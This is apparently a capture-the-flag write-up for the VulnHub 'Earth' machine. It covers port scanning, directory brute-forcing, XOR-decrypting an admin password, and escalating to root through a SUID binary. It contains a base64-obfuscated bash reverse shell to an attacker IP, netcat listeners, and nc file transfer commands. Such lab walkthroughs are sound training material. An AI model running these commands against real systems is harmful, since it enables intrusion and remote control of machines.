Earth target machine notes
Overview
This is a VulnHub target machine, mainly
Earth machine address: https://vulnhub.com/entry/the-planets-earth,755/#download
I. nmap scan
1. Port scan
-sT performs a full TCP connect scan, --min-rate 10000 sends at a minimum rate of 10000 packets per second, -p- scans all 65535 ports, and -o ports writes the results to the file ports
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds
2. Detailed scan
-sT for a TCP connect scan, -sV to probe service versions, -sC to run the default NSE scripts against the discovered ports ($ports, here 22, 80 and 443), -O to detect the operating system, with the output written to the details file
sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4
Result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds
The TLS certificate reveals two hostnames for the target, earth.local and terratest.earth.local; we add them to the /etc/hosts file.
3. Vulnerability script scan (--script=vuln)
nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
443/tcp open https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds
II. Web penetration
The target has ports 80 and 443 open, so we open them in a browser
Port 80
Port 443
It is the web server's default page
We also have the two hostnames, so we check them as well and find that both reveal the same information
It looks like a message-feedback page; below it is a Previous Messages section, i.e. earlier messages, which appear to be encrypted, and decrypting them will very likely give us something of interest.
At this point we can brute-force directories to widen our attack surface
sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
We can also add the parameter -x zip,tar,txt and similar extensions to expand the wordlist and run a second scan.
Directory brute-forcing reveals an /admin page under https://earth.local
It is a login page
That is all the information we have so far; of course we also try a few likely paths afterwards, such as /robots.txt and similar locations
Under the terratest.earth.local domain we find a /testingnotes.* entry; fuzzing the extension shows it is /testingnotes.txt
It contains a paragraph of text
The key pieces of information are:
XOR encryption is used
the contents of testdata.txt is the encryption key
terra is the username
View the contents of testdata.txt
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
We decrypt the contents in CyberChef
Decryption succeeds and yields the repeated string earthclimatechangebad4humans
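The same XOR decryption done in CyberChef above, written out as an added example (not code from the original writeup): the key is the testdata.txt text quoted on this page, and because the page does not reproduce the hex of the "Previous Messages", the ciphertext below is constructed by XOR-ing the repeated password with that key. The example also recovers the shortest repeating unit, which is how the repeated password is spotted in the decrypted output.

```python
# Added example: XOR-decrypt a hex-encoded message with a known key text,
# then recover the shortest repeating unit of the plaintext.
from itertools import cycle

# Key text: the contents of testdata.txt as quoted in the writeup.
KEY_TEXT = ("According to radiometric dating estimation and other evidence, "
            "Earth formed over 4.5 billion years ago. Within the first billion "
            "years of Earth's history, life appeared in the oceans and began to "
            "affect Earth's atmosphere and surface, leading to the proliferation "
            "of anaerobic and, later, aerobic organisms. Some geological evidence "
            "indicates that life may have arisen as early as 4.1 billion years ago.")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against key, cycling the key if data is longer than the key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decrypt_hex(cipher_hex: str, key_text: str) -> str:
    """Decode the hex message and XOR it with the key text."""
    plain = xor_bytes(bytes.fromhex(cipher_hex), key_text.encode())
    return plain.decode("latin-1")


def shortest_period(s: str) -> str:
    """Return the shortest prefix whose repetition reproduces s (truncation allowed)."""
    for n in range(1, len(s) + 1):
        if all(s[i] == s[i % n] for i in range(len(s))):
            return s[:n]
    return s


# Constructed ciphertext (not the page's real message): the repeated password
# XOR-ed with the key text, following the scheme testingnotes.txt describes.
PASSWORD = "earthclimatechangebad4humans"
SAMPLE_CIPHER_HEX = xor_bytes((PASSWORD * 6)[:160].encode(), KEY_TEXT.encode()).hex()

if __name__ == "__main__":
    plain = decrypt_hex(SAMPLE_CIPHER_HEX, KEY_TEXT)
    print(plain)
    print("repeating unit:", shortest_period(plain))
```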
This should be the password; we try logging in on the admin page
After logging in we see a command-execution box
III. Gaining a foothold
Construct the reverse-shell payload
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash
Run this in the web page
Start a listener on Kali
sudo rlwrap -cAr nc -lvnp 4444
We successfully obtain an initial shell
In /var/earth_web we find the user flag
IV. Privilege escalation to root
find / -perm -4000 -type f 2> /dev/null
There is a reset_root file that interests us; let's run it
It appears to fail
Use nc to transfer it to Kali for local analysis
On Kali run
nc -lvp 4444 > reset_root
On the target run
cat /usr/bin/reset_root | nc 192.168.52.3 4444
The transfer completes
chmod +x reset_root
Use file to inspect the file type
file reset_root
It is a Linux executable
Use ltrace to look at its library calls
ltrace ./reset_root
Several of the files it checks for do not exist
The program tries to access /dev/shm/kHgTFI5G, /dev/shm/Zw7bV9U5 and /tmp/kcM0Wewe, but the access fails (return value -1)
Create these files on the target
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Run it again
reset_root
The root password has now been reset to Earth
We have obtained root privileges
Found the root_flag
One final screenshot
[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
valid_lft 1730sec preferred_lft 1730sec
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute
valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
This machine has been fully compromised
Finally
happy hacking ~~~